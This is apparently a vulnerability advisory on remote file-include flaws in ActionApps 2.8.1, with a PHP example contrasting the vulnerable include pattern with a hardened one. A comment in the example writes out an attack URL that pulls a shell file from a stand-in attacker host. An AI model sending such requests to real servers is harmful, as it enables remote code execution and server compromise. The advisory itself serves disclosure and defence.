
J-Security Center


Title: ActionApps Multiple Remote File Include Vulnerabilities

Severity: HIGH

Description:

ActionApps is a collaborative web-publishing tool implemented in PHP.

ActionApps is prone to multiple remote file-include vulnerabilities because it uses the value of the 'GLOBALS[AA_INC_PATH]' variable in include/require statements without first validating it. When the web server runs PHP with register_globals enabled, that variable can be populated from request input, so an attacker controls the path that is included.

These issues affect the 'GLOBALS[AA_INC_PATH]' parameter of the following scripts; other scripts may also be vulnerable:

auth.php3
cached.php3
config.php3
constants.php3
cron.php3
csn_util.php3
discussion.php3
extauthnobody.php3
extauth.php3
event_handler.php3
event.class.php3
feeding.php3
fileman.php3
filldisc.php3
filler.php3
fillform.php3
formutil.php3
go.php3
hiercons.php3
item.php3
itemfunc.php3
itemview.php3
item_content.php3
javascript.php3
jsview.php3
live_checkbox.php3
mail.php3
mailman.php3
menu.php3
notify.php3
offline.php3
pagecache.php3
perm_sql.php3
post2shtml.php3
profile.php3
search.php3
searchbar.php3
searchlib.php3
slice.php3
slicedit.php3
sliceobj.php3
slicewiz.php3
sql_update.php3
stringexpand.php3
tabledit_util.php3
tabledit.php3
tv_email.php3
tv_misc.php3
view.php3
um_uedit.php3
um_util.php3
xml_fetch.php3
xml_rssparse.php3
zids.php3

Multiple files in the 'admin', 'includes', and 'modules' folders are also affected.

An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. Exploitation depends on the PHP configuration of the target: register_globals must be enabled for request input to reach the variable, and remote includes additionally require allow_url_fopen (and, on PHP 5.2 and later, allow_url_include) to be on. Where remote includes are disabled, the same flaw may still permit inclusion of local files.

These issues affect version 2.8.1; other versions may also be vulnerable.
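As an added illustration, not code from ActionApps or from this advisory, the following PHP shows the include pattern that gives rise to this class of bug beside one hardened form. The function names, the 'include' directory and the file names are hypothetical; the request shown in the comment is constructed for the example.

```php
<?php
// Added example (hypothetical code, not ActionApps source).
// Shows why a 'GLOBALS[AA_INC_PATH]'-style variable in a require is
// exploitable under register_globals, and one way to harden the pattern.

// --- Vulnerable pattern ---------------------------------------------------
// With register_globals=On, a constructed request such as
//   /item.php3?GLOBALS[AA_INC_PATH]=http://attacker.example/shell.txt?
// lets request input populate $GLOBALS['AA_INC_PATH'] before the script
// assigns it. The trailing "?" turns the "/config.php3" suffix into a query
// string, so the remote file is fetched and executed as PHP (provided
// allow_url_fopen, and on PHP >= 5.2 allow_url_include, permit it).
function vulnerable_bootstrap(): void
{
    require_once $GLOBALS['AA_INC_PATH'] . '/config.php3';
}

// --- Hardened pattern -----------------------------------------------------
// 1. Derive the include root from the script's own location (__DIR__),
//    never from a variable that request data could have populated.
// 2. Refuse to run at all if register_globals is enabled (PHP < 5.4 only;
//    later versions removed the directive, so ini_get() returns false).
// 3. Strip directory components from the requested file name, resolve the
//    result with realpath(), and confirm it still lies inside the root.
function hardened_bootstrap(string $file): string
{
    if (ini_get('register_globals')) {
        throw new RuntimeException('register_globals must be disabled');
    }

    $root   = realpath(__DIR__ . '/include');           // hypothetical directory
    $target = $root === false ? false : realpath($root . '/' . basename($file));

    if ($root === false || $target === false
        || strncmp($target, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException('refusing include outside trusted directory');
    }

    require_once $target;
    return $target;                                      // resolved path actually included
}
```

The hardened form never consults request data for the path at all; basename() plus the realpath() prefix check is a second line of defence in case the calling code is later changed to pass a user-supplied file name. A URL such as http://attacker.example/shell.txt fails both checks: basename() discards the scheme and host, and realpath() returns false for a file that does not exist under the root.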

Affected Products:

  • ActionApps ActionApps 2.8.1

References: